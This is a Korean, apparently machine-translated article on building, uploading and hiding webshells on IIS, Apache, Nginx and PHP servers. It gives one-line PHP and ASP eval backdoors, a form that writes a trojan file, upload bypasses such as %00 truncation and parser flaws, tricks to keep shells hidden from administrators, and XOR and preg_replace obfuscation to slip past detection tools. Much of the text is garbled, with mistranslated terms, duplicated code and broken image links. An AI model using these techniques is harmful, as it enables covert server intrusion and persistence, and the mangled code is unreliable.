Webshell 구현 및 숨기기 연구

1. webshell이란

1. webshell 소개

webshell은 이름에서 알 수 있듯이 web은 웹 서버를 의미하며, shell은 다음과 같이 작성된 스크립트입니다. 스크립팅 언어 프로그램인 webshell은 웹 관리 도구로, 웹 서버를 운영하는 권한을 가지고 있으며 webadmin이라고도 합니다. Webshell은 일반적으로 웹사이트 관리자가 웹사이트 관리, 서버 관리 등을 위해 사용합니다. 그러나 webshell은 상대적으로 강력하기 때문에 파일 업로드 및 다운로드, 데이터베이스 보기, 심지어 서버에서 일부 시스템 관련 명령(예: 사용자 생성)을 호출할 수도 있습니다. , 파일 수정 또는 삭제 등) 해커가 주로 사용하는 방법으로, 해커는 자신이 작성한 웹쉘을 웹 서버 페이지의 디렉토리에 업로드한 후 페이지 접근을 통해 침입하거나, 삽입하여 로컬 컴퓨터에 연결하는 등의 방법을 사용합니다. 한 문장 일부 관련 도구는 서버에 직접 침입 작업을 수행합니다.

1. 웹셸의 분류

웹셸은 크게 PHP 스크립트 트로이목마, ASP 스크립트 트로이목마, 스크립트 기반의 .NET 기반 스크립트 트로이목마, JSP 스크립트 트로이목마로 나눌 수 있습니다. 해외에도 Python 스크립트 언어로 작성된 동적 웹페이지가 있고, 물론 이와 관련된 웹쉘도 있습니다.

기능에 따라 큰말과 작은말로 나뉘기도 합니다. 작은말은 보통 트로이목마라는 문장을 가리킵니다. 예를 들면 <%eval request("pass")%> 문장을 문서 내부로 변환한 다음 파일 이름을 xx.asp로 변경합니다. 그런 다음 서버로 보냅니다. 여기서 eval 메소드는 request("pass")를 코드 실행으로 변환합니다. 요청 함수의 기능은 외부 파일을 적용하는 것입니다. 이는 한 문장으로 표현된 트로이 목마의 클라이언트 구성과 같습니다. 서버 구성(즉, 로컬 구성):

기본값

<form action=http: / /호스트 경로/TEXT.asp method=post> <텍스트 영역 이름=값 cols=120행=10너비=45> set lP=server.createObject("Adodb.Stream")//스트림 객체 생성 lP.열기 //열기 lP.Type=2 //텍스트 모드에서 lP.CharSet="gb2312" //글꼴 표준 lP.writetext 요청("새 값") lP.SaveToFile server.mappath("newmm.asp"),2 //파일을 덮어써서 newmm.asp에 트로이 목마 내용을 씁니다. 2는 덮어쓰는 방법입니다. lP.Close //객체 닫기 set lP=nothing //객체 해제 response.redirect "newmm.asp" //newmm.asp로 리디렉션 (트로이목마 생성을 위한 내용 추가)
<중앙>
<입력 유형=제출 값=제출>

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18

<form action=http : //호스트 경로/TEXT.asp method=post> < 텍스트 영역 이름=값 열=120행=10너비 =45> lP=서버를 설정합니다.createObject ("Adodb.Stream")//스트림 객체 생성 lP.열기//열기 lP.유형=2//텍스트 모드 lP.CharSet="gb2312"//글꼴 표준 lP.텍스트 쓰기 요청("newvalue") lP.SaveToFile 서버.mappath("newmm.asp"), 2//파일을 덮어써서 newmm.asp에 트로이 목마 내용을 씁니다. 2는 덮어쓰는 방법입니다. lP.닫기//객체 닫기 lP=설정//객체 해제 응답.리디렉션"newmm.asp"//newmm으로 리디렉션 .asp </텍스트 영역> <텍스트 영역 이름=새 값 열=120행=10너비=45> (트로이 목마 생성을 위한 콘텐츠 추가) </텍스트 영역> <BR> <센터> < br> <입력 유형=제출 값 = 제출>

여기서 트로이 목마는 양식을 제출하여 제출됩니다. 구체적인 방법은 개체 IP를 정의한 후 newvalue의 내용을 텍스트 형식으로 작성하는 것입니다. (newvalue의 내용은 textarea에 있습니다.) 정의) 덮어쓰기를 통해 ASP 파일을 생성한 후 이 스크립트를 실행합니다. 클라이언트의 값은 양식의 이름을 나타내며 서버(로컬 시스템)의 사후 제출에 있는 양식 이름과 동일해야 합니다. 따라서 여기의 값은 비밀번호와 같은 임의의 문자일 수 있습니다. , 하지만 '비밀번호'는 일반 텍스트이므로 가로챌 수 있습니다. PHP의 한 문장 원칙은 위의 원칙과 유사합니다. 즉, 언어의 차이로 인해 구문이 달라집니다. 이것이 기본적으로 조랑말이 작동하는 방식입니다.

말레이시아의 작업 모델은 훨씬 간단합니다. 클라이언트와 서버 사이에는 차이가 없습니다. 일부 스크립트 전문가는 한 문장의 트로이 목마를 서버 측에 직접 통합하여 말레이시아에 업로드했습니다. 그런 다음 말레이시아 URL 주소를 복사하여 직접 접속하여 해당 페이지의 웹 서버에 침투 작업을 수행합니다. 그러나 일부 웹사이트에서는 파일 업로드에 엄격한 제한이 있습니다. Da Ma에는 기능이 많기 때문에 크기가 상대적으로 커서 웹사이트의 업로드 제한을 초과할 수 있습니다. 그러나 Da Ma의 크기는 제어할 수 있습니다. 코드를 여러 번 삽입하거나 잘못된 파일에 코드를 삽입하는 경우) Xiaoma의 작업은 더 번거롭습니다. 먼저 Xiaoma를 업로드하여 웹셸을 얻은 다음 Xiaoma를 업로드하여 Xiaoma의 연결을 통해 서버를 얻을 수 있습니다.

2. 웹쉘 업로드 방법

1. 취약점 업로드 분석

이제 웹 서버 시스템마다 다른 웹 서버 프로그램이 주류를 이루고 있습니다. iis이고 Linux의 주류는 nginx입니다. 이러한 서비스는 웹 서버 구축에 큰 도움을 주지만 서버에 숨겨진 위험을 가져오기도 합니다. 이러한 서버에는 해커가 쉽게 악용할 수 있는 몇 가지 취약점이 있습니다.

(1)iis 디렉터리 구문 분석 취약점

예: /xx.asp/xx.jpg

업로드된 JPG 파일이더라도 해당 파일이 xx.asp에 있는 경우 iis가 이미지 파일을 xx.asp로 구문 분석하는 폴더입니다. 이 취약점은 iis5.x/6.0 버전에 존재합니다.

(2) 파일 구문 분석 취약점

예: xx.asp;.jpg. 웹 페이지가 업로드되면 jpg 파일이 인식되지만 iis는 업로드 후 이를 구문 분석하지 않습니다. 이후 문자도 파일을 asp 파일로 구문 분석합니다. 이 취약점은 iis5.x/6.0 버전에 존재합니다.

(3) 파일 이름 분석

예: xx.cer/xx.cdx/xx.asa. iis6.0에서는 cer 파일, cdx 파일, asa 파일이 실행 파일로 처리되며 내부의 ASP 코드도 실행됩니다. (asa 파일은 asp 전용 구성 파일이고, cer는 인증서 파일입니다.)

(4) fast-CGI 파싱 취약점

웹 서버에서 fast-CGI가 활성화된 경우 xx.jpg 이미지를 업로드하세요. 내용은 다음과 같습니다:

기본값

<?php fputs(fopen(' shell .php','w'),'<?php eval($_POST[shell])?>');?>

1	fputs(fopen('shell.php','w'),'eval($_POST[shell])?>');?>

1 < ;?phpfputs(fopen('shell.php','w'),' <🎜>평가<🎜>(<🎜>$_POST<🎜>[<🎜>쉘<🎜>]<🎜>)<🎜>?>') ;?> tr >

여기서 사용된 fput은 shell.php 파일을 생성하고 문장을 작성합니다. xx.jpg/.php 경로에 액세스하면 이 경로에 한 문장으로 구성된 Trojan shell.php가 생성됩니다. 이 취약점은 IIS 7.0/7.5 및 Nginx 버전 8.03 이하에 존재합니다. 로케일: PHP, prel, Bourne Shell, C 및 기타 언어.

*참고: fast-CGI는 CGI의 업그레이드 버전입니다. CGI는 서버에서 인간-컴퓨터 상호 작용을 제공하는 인터페이스를 의미합니다. CGI는 실행될 때마다 프로세스를 시작하기 위해 포크를 사용해야 하지만 fast-CGI는 항상 활성화 후에 실행되므로 모든 요청에 ​​대해 프로세스를 포크할 필요가 없습니다. 일반 CGI보다 메모리를 적게 차지합니다.

(5) Apache 구문 분석 취약점

Apache 구문 분석 방식은 오른쪽에서 왼쪽으로 이루어집니다. 성공적으로 구문 분석할 수 없으면 왼쪽으로 이동하려고 하지만 일반적으로 백그라운드 업로드는 업로드된 파일의 가장 오른쪽 접미사이므로 이를 기반으로 말 이름을 xx.php.rar로 지정할 수 있습니다. Apache는 rar를 구문 분석할 수 없으므로 php로 구문 분석하지만 백그라운드 업로드 지점에서는 rar로 구문 분석하여 우회합니다. 업로드 파일 접미사 제한

2. 업로드 자르기

사진을 업로드할 때 이름은 1.asp.jpg(asp 뒤에 공백이 있습니다) 업로드할 때는 NC 또는 burpsuite Capture를 사용하세요. 양식을 작성하고 업로드 이름 asp 뒤에 %00을 추가합니다(burpsuite에서 HEX 값을 직접 편집할 수 있습니다. 공백의 HEX 값은 20입니다. 20을 00으로 변경합니다). HEX가 00이면 잘림을 의미하고 20은 잘림을 의미합니다. 공백을 의미하는 경우 스크립트의 JPG 확인 문을 무시하고 ASP에 직접 업로드한다는 의미입니다.

3. 백엔드 데이터베이스 백업

일부 기업의 백엔드 관리 시스템에는 데이터베이스를 백업하는 기능이 있습니다(예를 들어 Southern CMS에는 데이터베이스를 백업하는 기능이 있습니다). . 트로이 목마 문장이 포함된 사진을 업로드하거나 말레이시아 텍스트를 jpg 형식으로 변경한 후 데이터베이스 백업 기능을 사용하여 사진을 asp 및 스크립트 문 형식으로 구문 분석한 다음 트로이 목마를 전달할 수 있는 기타 콘텐츠로 백업할 수 있습니다. 웹에 접속하여 실행할 수 있지만 이 방법은 현재 대부분의 cms에서 이 백업 기능을 취소하거나 비활성화했습니다.

4. 데이터베이스 문을 사용하여

(1) mysql 데이터베이스를 outfile로 업로드

이 방법의 전제는 웹사이트에 해당 주입 지점이 있어야 하며 현재 사용자는 업로드 권한이 있어야 하며, 서버에 현재 웹페이지의 절대 경로가 있어야 합니다. 방법은 공동 쿼리를 이용해 한 문장의 트로이목마를 웹사이트 아래의 PHP 파일로 가져온 뒤, 서버를 이용해 해당 웹사이트에 연결하는 것이다. 그러나 위 방법의 조건은 너무 가혹하여 거의 발생하지 않습니다.

(2) Trojan을 작성하는 새 테이블 만들기

일부 오픈소스 cms나 자체 제작한 웹셸에는 데이터베이스 관리 기능이 있습니다. 먼저 데이터베이스 관리 기능에 SQL 쿼리 기능이 있습니다. shell( codetext); shell이라는 테이블을 생성합니다. 테이블에는 code라는 목록이 있고 유형은 text입니다. 그런 다음 쉘(코드) 값('한 문장 말')에 삽입을 사용합니다. 여기서 쉘 테이블의 코드 열에 한 문장 말의 값이 할당된 다음 사용자 정의 백업을 통해 테이블을 x.php로 백업합니다. x를 php로 파싱한 후 실행합니다. 이것은 x.php가 아니며 x를 php로 파싱해야 합니다. 웹 서버마다 서비스 프로그램이 다르며 필터링 규칙도 다르며 다른 방법을 사용할 수도 있습니다.

(3)phpMyadmin 설정 오류

phpMyadmin은 웹사이트 데이터베이스를 관리하는 데 사용되는 도구로, 파일을 볼 때 $cfg 값이 config.inc.php인 경우. ['Servers'][$i]['auth_type'] 매개변수 설정이 설정되지 않았습니다(기본값은 config). 이는 데이터베이스에 로그인할 때 해당 확인이 수행되지 않음을 의미합니다. 데이터베이스에 직접 연결할 수 있습니다. , 일부 버전의 Mysql에서는 기본 로그인이 루트 사용자(즉, 관리자)로 로그인되므로 로그인 권한이 최대가 됩니다. 그러나 루트는 일반적으로 로컬로만 로그인할 수 있으므로 원격 로그인 사용자를 생성해야 합니다. 원격 로그인 사용자로 로그인한 후 테이블을 생성하고 그 안에 한 문장의 트로이 목마를 작성합니다.

3. 웹쉘의 '보안'

1. 웹쉘 숨기기에 대하여

웹쉘 업로드 시 웹쉘을 숨겨야 합니다. 웹셸을 숨기는 첫 번째 목적은 웹사이트 관리자가 이를 발견하여 삭제하는 것을 방지하는 것입니다. 두 번째 목적은 다른 해커가 이 파일을 발견하여 사용하는 것을 방지하는 것입니다.

(1) 말레이시아의 숨겨진

①언데드 좀비

Windows 시스템에는 시스템 예약 폴더 이름이 있습니다. Windows에서는 이러한 이름을 사용하여 예약 폴더를 지정하는 것을 허용하지 않습니다. aux|prn|con|nul|com1|com2|com3|com4|com5|com6|com7|com8|com9|lpt1|lpt2|lpt3|lpt4|lpt5|lpt6|lpt7|lpt8|lpt. 그러나 다음과 같은 Windows 복사 명령을 사용하여 만들 수 있습니다.

Default

c:>copy 3. asp \.C:aux.asp

1	c:>복사3.asp .C:aux.asp

file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image020.png

file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image022.jpg

C 드라이브에 aux.asp를 만듭니다. 이 파일은 그래픽 인터페이스에서 삭제할 수 없습니다.

file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image023.png

삭제하려면 del 명령어를 사용해야 합니다.

file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image024.png

삭제 후 메시지가 표시되지 않지만 파일이 실제로 사라졌습니다.

물론 이 방법을 사용하면 그래픽 인터페이스를 통해 삭제할 수 없는 웹셸을 만들 수 있지만, 웹페이지의 루트 디렉터리에 직접 배치하는 경우에도 경험이 있는 경우 삭제됩니다. 네트워크 관리자가 이를 볼 수 있습니다.

②clsid 숨김

Windows의 모든 프로그램에는 clsid가 있습니다. 폴더 이름을 x.{program clsid}로 지정한 경우 다음 두 명령을 입력하세요.

file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image026.jpg

생성 후

file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image027.png

클릭하여 제어판에 들어가지만 실제로는 파일이 여전히 폴더이고 그 안에 Malaysia가 여전히 존재합니다. clsid를 사용하여 해당 폴더를 만들고 해당 프로그램의 이름을 지정할 수도 있습니다. 예를 들어, 네트워크 관리자는 휴지통 폴더를 입력하여 휴지통 clsid가 있는 폴더를 만들고 그 안에 예약어 asp를 복사할 수도 있습니다.

기본값을 사용할 수도 있습니다.

attrib +h +s +r +d/s /d

1	attrib+h+s+r+d/s/d

1

속성

+

h

+

s

+r

+d

/s

/

d

1	file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image028.png

이 파일의 속성을 수정하고 숨기세요. 일반적으로 Windows는 기본적으로 숨김 파일을 표시하지 않으며, 휴지통 폴더가 자동으로 생성되므로 불멸의 웹쉘이 서버에 숨겨질 수 있습니다. 3드라이버 숨기기 기술 Windows 파일 시스템에서는 폴더를 열 때 시스템이 IRP_MJ_DIRECTORY_Control 함수를 보내는 것이 원칙입니다. 이 함수는 버퍼와 정보를 할당할 수 있습니다. 폴더 아래의 하위 폴더를 순회하여 얻은 내용은 버퍼에 저장됩니다. 순회 시 일치하는 파일 이름을 찾아보고, 파일 이름이 일치하면 현재 폴더나 파일을 우회하는 원리로 코드를 확인했습니다. 제가 이해한 바에 따르면 대상 파일을 쿼리할 때 탐색된 포인터를 기준으로 파일의 오프셋을 추가하며 대상 폴더를 스캔하지 않고 직접 건너뜁니다. 이 기술의 구현과 관련하여 인터넷에 많은 C 소스코드가 있음에도 불구하고 헤더 파일 지원 및 시스템 지원으로 인해 작동이 어렵습니다. (시스템마다 파일 시스템이 다를 수 있음) . 온라인에서 Easy File Locker 프로그램을 찾았는데 웹 서버에 설치하고 대상 파일에 대한 권한을 설정해야 합니다. 기본값file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image028.png

1파일:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image028.png
권한 설정에는 읽기, 쓰기, 삭제 및 표시가 포함됩니다.

기본값

file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image030.jpg

1	file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image030.jpg

1 td>

파일

:

///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image030.jpg

위 그림에서 볼 수 있듯이 앞서 언급한 대로 순회가 직접 우회되기 때문에 절대 경로를 숨겼습니다. 접근 가능합니다. 내 이해는 다음과 같습니다

1 2 3 4

c:WINDOWSxlkfs.dat c:WINDOWSxlkfs.dll c:WINDOWSxlkfs.ini c:WINDOWSsystem32driversxlkfs.sys

기본

c:WINDOWSxlkfs.dat c:WINDOWSxlkfs.dll c:WINDOWSxlkfs.ini c:WINDOWSsystem32driversxlkfs.sys

tbody>

1

2

3

4

c

:

WINDOWS

xlkfs

.

데이터

c:

WINDOWS

1	include($include);?>

xlkfs.dllc:WINDOWSxlkfs.inic:WINDOWSsystem32드라이버xlkfs.sys

이 4개 파일은 순회 쿼리를 대체합니다. 숨겨진 파일에 액세스하려면 절대 경로를 입력해도 절대 경로 쿼리가 적용되지 않지만 위 4개 파일을 통해 쿼리됩니다. 숨겨진 파일에 대해 별도의 드라이버를 만드는 것과 동일합니다. 관리자에게 들키지 않으려면 Easy FileLocker 프로그램을 삭제하면 되지만, 위 4개 파일은 삭제할 수 없습니다. 프로그램을 삭제한 후에도 백도어 숨기기 기능을 수행하는 절대 경로를 입력하여 계속 액세스할 수 있습니다4레지스트리 숨기기레지스트리 경로: HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionexplorer＼AdvancedFolderHiddenSHOWALL 이 경로에 CheckedValue 키가 있습니다. 0으로 변경하세요. CheckValue 키가 없으면 직접 만들고 값을 0으로 지정하세요. 그러면 생성된 숨김 파일이 완전히 숨겨집니다. 폴더 옵션. 다음 "모든 파일 표시" 옵션도 표시할 수 없습니다. (2) 한 문장 트로이 목마 숨기기 ①헤더 파일 포함 숨기기웹의 일부 스크립트 파일에는 일부 파일에 include 문이 있는데 이를 사용할 수 있습니다. 메소드에는 문장 파일이 포함되어 있으며 이 페이지에 액세스할 때 이러한 문장이 직접 호출됩니다. asp include 문: , 경로를 직접 입력하며 파일 경로는 웹 서버의 경로입니다. Webmaster Stop을 사용하여 이미지에 NTFS 스트림 포니의 문장을 작성할 수 있습니다. 경로에 ''를 ':'로 쓴 후 이미지가 표시되지 않습니다. 웹 서버의 asp 파일로 이동하여 파일 시작 부분에 include 문을 작성합니다. <🎜><🎜>php에는 <🎜><🎜><🎜><🎜><🎜><🎜>Default<🎜><🎜><🎜><🎜><🎜><🎜 명령문이 포함되어 있습니다. >

1	<🎜>포함<🎜>(<🎜> $ 포함<🎜>)<🎜>;<🎜>?>

여기서 $include는 다음과 같은 외부 경로일 수 있습니다.

http://www.aaa.com/1.php?Include=http://www .bbb.com/hehe.php

이 aaa의 1.php 내용은

기본

1

1	include($include);?>

<🎜>포함<🎜>(<🎜>$include<🎜>)<🎜>;<🎜>?>

은 포함을 의미합니다. bbb는 외부 서버입니다. 단, 이 서버는 PHP를 지원할 수 없습니다. 그렇지 않으면 bbb 서버에서 hehe.php(즉, 한 문장 말)는 실행되지만 aaa는 실행되지 않습니다.

②구성 파일 숨김 문장(PHP)

PHP 웹셸을 얻은 후 php.ini를 사용하여 파일을 숨기고 구성 파일을 편집할 수 있습니다. 특정 파일의 내용을 인터페이스의 머리글과 바닥글에 추가:

auto_prepend_file =hehe.php

그런 다음

include_path를 살펴보세요. = "E:PHPnow-1.5.6htdocs;"

이 구성 정보는 머리글과 바닥글을 로드할 컬렉션의 위치를 ​​나타냅니다. 경로 규칙은 "path1;path2"입니다. path1 경로의 폴더는 경로에 있는 파일에 헤더 및 바닥글 파일을 추가합니다. 여기에는 루트 경로를 나타내는 '.'이 있으므로 홈페이지에 추가하는 것과 동일합니다. .asp 파일이면 끝입니다. PHP를 통해 헤더 기능을 추가하고 웹 사이트 홈 페이지에 문장을 작성합니다.

3404 포니

404 포니는 접속시 존재하지 않는 404 페이지를 표시하지만 실제로는 트로이목마 코드가 실행된 상태입니다. 일반적으로 Shift를 5번 누르면 제거됩니다. 밖으로.

4. 웹쉘 안티 바이러스와 안티 바이러스에 대한 한 문장

1. 우회 탐지(PHP) 구축 방법

일반 탐지 프로그램에서는 이러한 "_POST"를 필터링합니다. , "system" 및 "call_user_func_array"와 같은 문자의 경우 현재 일부 감지 프로그램을 우회하기 위한 구성 방법을 사용할 수 있습니다. 기본 원칙은 PHP의 각 문자가 XOR로 대체된다는 것입니다. 두 문자의 값입니다.

예를 들어 코드는 다음과 같습니다

Default

<?php @$_++; // 여기서 ++는 '_'를 1씩 증가시킵니다. $__=("#"^"|") // _ $__=("."^"~") //피 $__=("/"^"`"); // O $__=("|"^"/"); $__=("{"^"/"); ?>

1 2 3 4 5 6 7 8

@$_++; // 这里++让’_’自加1 $__=("#"^"|"); // _ $__=("."^"~"); // P $__=("/"^"`"); // O $__=("|"^"/"); // S $__=("{"^"/"); // T ?>

1

2

3

4

5

6

7

8

<🎜><🎜><🎜>@<🎜>$_<🎜>++<🎜>;<🎜>                                                                🎜><🎜><🎜><🎜><🎜><🎜><🎜 ><🎜>$__<🎜>=<🎜>(<🎜>"#"<🎜>^<🎜>"|"< 🎜>) <🎜> 🎜><🎜>$__<🎜>=< 🎜>(<🎜>"."<🎜>^<🎜>"~"<🎜>)<🎜>;<🎜>                                                 ><🎜><🎜><🎜> <🎜><🎜><🎜>< 🎜><🎜><🎜><🎜><🎜><🎜>$__<🎜>=<🎜>(<🎜> "/"<🎜>^<🎜>"`"<🎜>)<🎜> ;<🎜>                               ><🎜><🎜><🎜><🎜><🎜><🎜>$__<🎜>=<🎜>(<🎜>"|"<🎜>^<🎜>"/"< 🎜>)< 🎜>;<🎜> <🎜>// ㅇ<🎜><🎜><🎜><🎜><🎜><🎜><🎜><🎜><🎜><🎜><🎜>< 🎜><🎜 >$__<🎜>=<🎜>(<🎜>"{"<🎜>^<🎜>"/"<🎜>)<🎜>;<🎜>                                                 <🎜><🎜><🎜 ><🎜><🎜><🎜><🎜><🎜><🎜><🎜><🎜>?>

그러면 구조와 문장은

Default로 쓸 수 있습니다.

<?php @$_++; $__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/ "); // $__의 값은 _POST입니다. @${$__}[!$_](${$__}[$_]);?>

1 2 3

@$_++; $__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/"); // $__的值为_POST @${$__}[!$_](${$__}[$_]);?>

1

2

3

@

$_

+ +

;

$__

=

(

"#"^"|"

)

.

1	$__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/")

(

"."

^

"~"

)

.

(

"/"

^

"`"

)

.

(

"|"^"/").

(

"{"

^"/")

;

 

// $__의 값은 _POST @${$__}[!$_]($ {$__}[$_]);?> // 결과는 @$_POST[0]($POST[1])!$_는 1의 반대를 나타냅니다. 언어에서는 1이 true, 그 반대가 0(false)을 나타냅니다.그런데 이 우회 방법은 잘 생각해보면 두 문자의 이진값을 XOR하더라도 특정 문자를 사용하고 싶다면 여전히 그 값을 적용하는 방식이다. 예를 들어 기본값$__=("#"^"|")과 같습니다. ("."^"~").(" /"^"`").("|"^"/").("{"^"/")의 바이너리 값은 탐지 프로그램이 탐지한 경우 _POST 문자의 값과 동일합니다. 바이너리 코드의 값을 변경하더라도 여전히 종료됩니다. 2. 정규식 대체 방법(PHP) PHP에는 정규식 대체를 구현할 수 있는 preg_replace() 함수가 있습니다. 탐지 시스템을 우회하기 위해 대체를 사용하려면 PHP 스크립트 언어의 함수 기능도 필요합니다. 함수가 호출될 때 함수의 형식 매개변수에 할당된 값에 명령이 포함되어 있으면 명령이 실행됩니다. 기본값(.+?)/ies",'funfunc("1")', $_POST["cmd"]); ?>테이블>

위 코드는 먼저 빈 함수를 만든 후 preg_replace 함수를 사용하여

1 2 3 4	functionfunfunc($str){} echopreg_replace("//ies",'funfunc("1")',$_POST["cmd"]); ?>
1	$__ =("#"^"|").("."^" ~").("/"^"`"). ("|"^"/").("{"^"/")
1 2 3 4	<🎜><🎜><🎜>기능<🎜><🎜>funfun< 🎜>(<🎜>$str<🎜>)<🎜>{<🎜>}<🎜><🎜><🎜><🎜><🎜><🎜><🎜><🎜><🎜><🎜> <🎜>echopreg_replace<🎜>(<🎜>"//ies",'funfunc("1")',$_POST["cmd"]); ?>